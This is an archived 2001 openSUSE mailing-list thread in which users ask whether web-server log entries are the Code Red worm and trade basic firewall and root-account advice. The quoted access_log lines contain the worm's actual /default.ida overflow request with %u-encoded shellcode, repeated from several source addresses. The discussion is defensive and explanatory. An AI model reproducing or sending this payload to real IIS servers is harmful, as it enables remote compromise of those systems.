Mailinglist Archive: opensuse (4053 mails)

< Previous Next >
Re: [SLE] code red question....
You should really be running some sort of firewall, even if you are connected
to the internet for only a short time each day. In checking through my
firewall logs, there have been 412 probes of my machine in the last 30 hours
or so, which is a lot more than normal, by a factor of about a hundred! This
does seem to be affecting mostly routers and IIS, but I doubt that it will be
very long before some devious person comes up with a widespread virus or worm
that could compromise a Unix machine. One basic precaution that I take is to
never access the internet (or open any file that I don't recognize!) while
logged in as root.

Kevin

On Tuesday 07 August 2001 20:06, Curtis Rey wrote:
> Ive got the same sort of logs on my sys. I have disable forwarding. What,
> if anything should is shut down.
>
> Cheers, Curtis
>
> On Tuesday 07 August 2001 11:19, Anders Johansson wrote:
> > On Tuesday 07 August 2001 12:53, Jim Hatridge wrote:
> > > Hi all..
> > >
> > > After all this talk about code red, I looked at my access_log and found
> > > this stuff. Is this the code red attack? If so, do I need to worry
> > > about it? I'm running a "plain jane" install of SuSE 7.1 on my internet
> > > machine. I am on a 56k dialup and only on the net about 30 minutes per
> > > day. Also the first line (127.---) is that my localhost?
> > >
> > >
> > > TIA
> > >
> > >
> > > JIM
> > >
> > > ***********************************************************************
> > >** ** ***
> > >
> > > 127.0.0.1 - - [09/Apr/2001:11:43:57 +0200] "GET /robots.txt HTTP/1.0"
> > > 200 231
> >
> > 127.0.0.1 is localhost, yes, so this is some program on your machine
> > trying to see if you have robots.txt - a file that tells web spiders your
> > 'spider policy'. In this file you can put web directories you don't want
> > indexing agents and other web crawling agents to touch
> >
> > > 194.158.105.5 - - [22/Apr/2001:16:14:55 +0200] "GET http://www.amd.com/
> > > HTTP/1.0" 200 4676
> >
> > This looks like someone trying to use your comp as a proxy
> >
> > The rest are code red, but as has been pointed out, only IIS users need
> > worry about it
> >
> > > 24.139.0.245 - - [22/Jul/2001:12:40:53 +0200] "GET
> > > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
> > >uc bd3
> > > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> > >a HTTP/1.0" 400 319
> > >
> > > 212.84.163.91 - - [01/Aug/2001:21:18:55 +0200] "GET
> > > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
> > >uc bd3
> > > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> > >a HTTP/1.0" 400 319
> > >
> > > 202.105.119.98 - - [04/Aug/2001:14:59:04 +0200] "GET
> > > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
> > >uc bd3
> > > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> > >a HTTP/1.0" 400 319
> > >
> > > 213.168.222.197 - - [04/Aug/2001:19:54:47 +0200] "GET
> > > /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > >XX XX
> > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > >XX XXX
> > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > >XX XXX
> > > XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
> > >uc bd3
> > > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> > >a HTTP/1.0" 404 272
> > >
> > > 211.222.31.2 - - [04/Aug/2001:20:10:21 +0200] "GET
> > > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> > >NN NNN
> > > NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
> > >uc bd3
> > > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> > >a HTTP/1.0" 400 319
> > >
> > > *********************************************************************
> >
> > regards
> > Anders

< Previous Next >